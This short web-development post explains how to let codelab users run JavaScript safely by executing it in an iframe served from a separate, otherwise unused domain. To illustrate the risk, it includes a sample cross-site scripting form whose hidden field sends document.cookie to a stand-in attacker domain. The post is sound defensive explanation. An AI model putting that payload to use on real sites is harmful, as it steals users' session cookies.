Under normal circumstance we disallow any javascript to be executed from the user entered input as it can lead to cross site scripting (xss) problems. When we create online javascript codelabs, we actually want to execute Javascript which is entered by user.
If we allow javascript to be executed on the site (same domain), this can lead to xss attack on the site. Any bad domain can create a form with some hidden javascript input and submit to our site. That javascript can potential send cookies on our site to the bad domain. Here is a sample code which bad domain/site can use.
<form action="http://www.yourgoodsite.com/blah/blah/" method=post>
<input type=hidden name=data value='<script>window.open("http://baddomain.com/?stolen_cookie=" + document.cookie)</script>' />
<input type=submit value=submit>
</form>
This code creates a form on bad domain which has javascript in hidden variable. Since you are allowing javascript execution at your site, when user clicks on the submit button, the javascript will get executed.
Solution
One possible solution is to register and setup a new domain www.yourgoodsite2.com and only allow javascript execution on this domain. Don’t use this domain for any other purpose. So there is no incentive to steal anything (cookie, etc) from this domain. Here is a part of html form code for this:
<div> <form action="http://www.yourgoodsite2.com/blah/blah/" method="post" target="srctarget" onsubmit="return srcsubmit();"> <textarea name="data"></textarea> <input type="submit" value="Run" /> </form> </div> <div> <iframe id="srctarget" name="srctarget" src="http://http://www.yourgoodsite2.com/blah/blah/" height="240" width="320"></iframe> </div>
Note that the code reside on main website (www.yourgoodsite.com) but the rendered outcome is displayed in an iframe which is served from www.yourgoodsite2.com.
